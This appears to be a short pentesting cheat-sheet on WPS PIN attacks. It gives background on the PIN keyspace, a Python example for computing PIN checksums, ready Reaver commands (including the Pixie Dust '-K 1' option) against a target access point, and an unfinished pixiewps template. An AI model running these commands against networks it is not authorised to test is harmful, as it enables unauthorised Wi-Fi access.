WPS
WPS (Wi-Fi Protected Setup)
WPS is a convenient feature which allows users to connect devices to PSK networks without configuring the PSK on a client.
Typically, it was deployed either as a physical button that is pressed when a client wishes to associate, or as a PIN.
The PIN option was defined as a mandatory requirement, although certain implementations and configurations deactivate it.
Attacks were developed against the keyspace that the PIN can occupy: 10,000,000 possible combinations.
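The 10,000,000 figure follows from the PIN format: a WPS PIN has eight digits, but the eighth is a checksum over the first seven, so only 10^7 values are valid. The sketch below is an added example, not code from the original page or from Reaver or pixiewps; the function names are illustrative. It computes the check digit and validates a PIN, which is useful when auditing the PIN printed on or configured in an access point.

```python
# Added example: WPS PIN check digit and validation.
# Function names are illustrative and not taken from any tool.

KEYSPACE = 10 ** 7  # seven free digits; the eighth is derived from them


def wps_pin_checksum(first7: int) -> int:
    """Return the check digit for the first seven digits of a WPS PIN."""
    if not 0 <= first7 < KEYSPACE:
        raise ValueError("expected a value of at most seven digits")
    accum = 0
    digits = first7
    while digits:
        accum += 3 * (digits % 10)  # 1st, 3rd, 5th, 7th digit from the right: weight 3
        digits //= 10
        accum += digits % 10        # 2nd, 4th, 6th digit from the right: weight 1
        digits //= 10
    return (10 - accum % 10) % 10


def full_pin(first7: int) -> str:
    """Build the eight-digit PIN string (zero padded) for a seven-digit value."""
    return f"{first7:07d}{wps_pin_checksum(first7)}"


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is eight ASCII digits and its last digit is the checksum."""
    if len(pin) != 8 or not (pin.isascii() and pin.isdigit()):
        return False
    return wps_pin_checksum(int(pin[:7])) == int(pin[7])


def valid_check_digits(first7: int) -> list[int]:
    """All final digits that make a valid PIN for this prefix (always one)."""
    prefix = f"{first7:07d}"
    return [d for d in range(10) if is_valid_wps_pin(f"{prefix}{d}")]


if __name__ == "__main__":
    # Constructed sample values, not taken from any real device.
    for sample in (1234567, 0, 1):
        print(full_pin(sample), valid_check_digits(sample))
```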
Reaver
Get the initial information from Reaver.
Generates an automatic PIN based on the BSSID for Zyxel, D-Link, and Belkin.
REAVER:
reaver -i wlan1mon -c <chan#> -b <MACaddy> -vvv -K 1
reaver -i wlan0mon -b [BSSID] -vv -S -c [AP channel]
Pixiewps
We need the following values from Reaver to use with pixiewps:
- PKE
- PKR
- e-hash 1
- e-hash 2
- E-nonce
- R-nonce
- authkey

When using the -P (Pixiedust loop) option, Reaver goes into a loop mode that breaks the WPS protocol by not using the M4 message, in order to avoid lockouts. This option can only be used for collecting PixieHash values to use with pixiewps.
Example:
TODO
pixiewps --pke ... --pkr ... --e-hash1 ... --e-hash2 ... --authkey ... --e-nonce ...